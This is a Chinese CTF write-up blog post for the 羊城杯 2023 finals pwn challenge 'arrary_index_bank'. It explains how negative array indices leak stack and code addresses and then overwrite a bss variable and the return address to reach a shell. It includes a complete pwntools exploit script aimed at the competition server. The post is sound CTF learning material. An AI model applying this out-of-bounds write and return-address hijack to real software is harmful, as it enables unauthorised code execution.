[羊城杯 2023 决赛]arrary_index_bank

已于 2024-04-15 13:29:08 修改
阅读量494 收藏
点赞数 14
文章标签: 数据结构
于 2024-04-15 13:22:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A13837377363/article/details/137777175
版权

这题有一定记录价值。

这是题目主要函数,就是查看与更改,但下标都不能大于you,就是1。

一开始没反应过来,可能还是题做得太少了,后来想到下标越界来更改返回地址,但有you的限制,很明显不能直接改。一开始有考虑整数溢出,后来发现它整个过程整数类型没变,都是int64,溢出没用。

有用的函数就是查询和更改,且index<=1,后来想到,index可以为负数,并且查询之前执行了read_long函数,会压入返回地址和rbp的地址,可以通过查询这两个确认栈的地址和text段的地址。

这是执行read_long时栈的情况,注意断点一定要打在这个read_long。

因为这个离打印v1[v3]最近,能查看到打印出来的值与栈地址和text地址的偏移。

同时有个小技巧:

telescope 地址  行数

这个gdb指令可以查看相应栈地址下对应行数的信息。

最后直接更改you的值,之前没遇到过用负数查询泄露信息,并直接通过栈上的数组更改bss段变量的题。

以下是代码:

from pwn import *
context.arch='amd64'
#io=process('./pwn')
io=remote('node4.anna.nssctf.cn',28063)
#io.recvuntil(b'> ')
io.sendline(b'1')
#io.recvuntil(b"Whose account?\n")
io.sendline(b'-1')
io.recvuntil(b'=')
addr=int(io.recvuntil(b'\n',drop=True),10)
addr-=255
base=addr-0x1327
back=base+0x1318
#io.recvuntil(b'> ')
io.sendline(b'1')
#io.recvuntil(b"Whose account?\n")
io.sendline(b'-2')
io.recvuntil(b'=')
addr=int(io.recvuntil(b'\n',drop=True),10)
rsp=addr-0x30
you=base+0x4010
offset=(you-rsp)//8
#io.recvuntil(b'> ')
io.sendline(b'2')
#io.recvuntil(b"Whose account?\n")
io.sendline(str(offset).encode())
#io.recvuntil(b"How much?\n")
io.sendline(b'1000')
#io.recvuntil(b'> ')
io.sendline(b'2')
#io.recvuntil(b"Whose account?\n")
io.sendline(b'7')
#io.recvuntil(b"How much?\n")
io.sendline(str(back).encode())
io.recvuntil(b'> ')
io.sendline(b'5')
io.interactive()

这道题好像有运行时间限制,都加上recvuntil容易一半就断开,所以都注释掉了。

奇怪的轩轩
关注
  • 14
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Golang 检查元素在slice中是否存在 模仿Php实现arrary_In
q601046124的专栏
10-19 243
正常的我们会自己写一个这样的方法,但是很不通用,因为有时候是查找int 有时候查找string func Find(slice []string, val string) (int, bool) { for i, item := range slice { if item == val { return i, true } } return -1, false } 所以为了扩展性我 推荐一个git库 ...
2023年“羊城”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全
Jay17的博客
09-16 6973
2023年“羊城”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全
2023羊城决赛 pwn
qq_62172019的博客
09-18 280
因为库版本是2.23没有对top块大小做检查所以可以正应了题目的名字(house of force)发现第一次申请一个巨大的块泄露地址,第二次可以申请小于0x30的堆块修改top块的大小。第三次申请把malloc_got拿出来写上system第四次申请就成功getshell。注意:直接覆盖成后门地址会因为对齐出问题所以应该跳过push命令以后。没有开pie 堆地址存在固定位置上可以使用unlink攻击。-7的位置上面存在函数返回地址。成功getshell。成功getshell。成功getshell。
羊城2023 pwn-arrary_index_bank
最新发布
sagic的博客
07-19 184
存在整数溢出,不可以直接改地址,因为super_ai的返回地址一定比v1高所为不行。会等于0x38呢,因为7*8产生了进位所以4被64位舍弃。程序中含有system函数初步判定可能为ret2text。地址因为是十进制所以进行转换查看是否泄漏成功。地址已经泄漏完成开始payload的搭建。cmp操作进行完比较相同为0不相同为1。接收地址-super_ai的返回地址。考虑堆栈平衡 + 0x1315。发现RAX已经变成负数。泄漏地址为rbp下一位。如何进行整数溢出呢?
2023 羊城 final
qq_61670993的博客
11-21 147
数组越界, house of force, house of husk
PHP函数array_reduce
mianhuatangVSyeyu的博客
11-04 858
array_reduce使用回调函数处理一个数组中的每个元素 接受$input, $function,$initial三个参数 1. $input 必须 要被处理的数组 2. $function 必须 处理数组的函数 3. $initial 可选,默认为null 作为结果的初始值 /** * Iteratively reduce the array to a single value using a callback function * @link https://php.ne...
利用arrary_agg方便的实现相同键值的文本拼接
conglei2565的博客
12-09 110
今天一个客户问怎样把表中相同键值对应的文本按照一定顺序拼接起来。如果使用SQL实现将非常麻烦,并且效率低下。GP4.1以后提供了一个函数array_agg可以方便快捷,高效的实现该功能 比如原始查询是 test1=# sel...
PHP array_column用法
只有不断总结的人才能不断进步
10-23 9923
一般array_column是获取二维数组的制定列,组成新的数组输出。今天看到有可以制定第三个参数,制定输出数组的key。 &amp;lt;?php $arr = [ [ 'id' =&amp;gt; 1, 'name' =&amp;gt; 'a' ],[ 'id' =&amp;gt; 2, 'name' =&amp;gt; 'b', ], [ ...
数据结构--二叉树遍历
binhyun的博客
07-15 653
(1)前序遍历 (2)定义结构体 (3)前序遍历实现 (4)中序遍历实现 (5)二叉树的节点个数 (6)二叉树树叶节点个数 (7)二叉树的高度 (8)二叉树节点的开辟 (9)建立一个测试二叉树 (10)测试二叉树相关函数的功能 (11)第k层的数据个数 (12)二叉树里面查找节点
数据结构第35节 性能优化 算法的选择
hummhumm的专栏
07-18 367
算法的选择对于优化程序性能至关重要。不同的算法在时间复杂度、空间复杂度以及适用场景上有着明显的差异。下面我将结合具体的代码示例,来讲解几种常见的算法选择及其优化方法。
数据结构(5.1)——树的性质
m0_65240792的博客
07-16 208
1%29%5D。
24暑假算法刷题 | Day16 | LeetCode 513. 找树左下角的值,112. 路径总合,106. 从中序和后序遍历序列构造二叉树
weixin_54468359的博客
07-18 793
24暑假刷题day15打卡 二叉树进阶
数据结构】二叉树-1
m0_46676283的博客
07-15 860
现实中我们通常把堆(一种二叉树)使用顺序结构的数组来存储,需要注意的是这里的堆和操作系统虚拟进程地址空间中的堆是两回事,一个是数据结构,一个是操作系统中管理内存的一块区域分段。对于深度为K的,有n个结点的二叉树,当且仅当其每一个结点都与深度为K的满二叉树中编号从1至n的结点一一对应时称之为完全二叉树。也就是说,如果一个二叉树的层数为K,且结点总数是 ,则它就是满二叉树。双亲节点或父节点:若一个节点含有子节点,则这个节点称为其子节点的父节点;孩子节点或子节点:一个节点含有的子树的根节点称为该节点的子节点;
【排序算法】—— 归并排序
2302_80105876的博客
07-15 810
归并排序,排序,归并排序非递归,有序数组排序,外排序算法
数据结构】手写快速排序
qq_59143106的博客
07-14 303
什么是快速排序?首先确立pivot,比如下图位于末尾然后i遍历3到6在3的时候,j指向i前面一位如果3
【Java--数据结构】栈的应用
2301_80898480的博客
07-14 753
如有错误,欢迎指出~
(9)Python 数据结构:构建高效算法与金融应用的基石
架构筑梦的Cherry Yang的博客
07-14 947
当我们谈论数据结构时,我们实际上是在探讨一种组织、存储和管理数据的系统方法。在编程中,数据结构的选择对程序的性能、可读性和可维护性都有着深远的影响。Python,作为一种功能强大且易于学习的编程语言,提供了丰富的数据结构供我们使用。
数据结构小测试:排序算法
m0_63432840的博客
07-14 544
冒泡排序:将相邻元素之间的比较和交换,使得每一轮比较后,最大的元素能够到达数组的末尾。重复这个过程,直到整个数组有序。选择排序:在每一轮中,找到数组中最小的元素,并将其与当前轮的第一个元素交换位置。重复这一操作,使得每一轮过后,都有一个元素被放到了正确的位置上。插入排序:将数组分为已排序部分和未排序部分,每次从未排序部分取出一个元素,插入到已排序部分的正确位置上。希尔排序:首先确定一个间隔序列,按此间隔将数组元素分组并进行插入排序。随后逐渐缩小间隔并重复排序过程,直到间隔为1。
php arrary_push
04-05
array_push() is a PHP function used to add one or more elements to the end of an array. It takes two arguments, the first being the array to which the elements are to be added, and the second being the element(s) to add. Syntax: ``` array_push(array $array, mixed $value1, mixed $value2 =?): int ``` - $array: Required. Specifies the array to which the element(s) will be added. - $value1, $value2, …: Required. Specifies the element(s) to add to the array. Example: ``` $fruits = array("apple", "orange", "banana"); array_push($fruits, "mango", "grapes"); print_r($fruits); ``` Output: ``` Array ( [0] => apple [1] => orange [2] => banana [3] => mango [4] => grapes ) ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值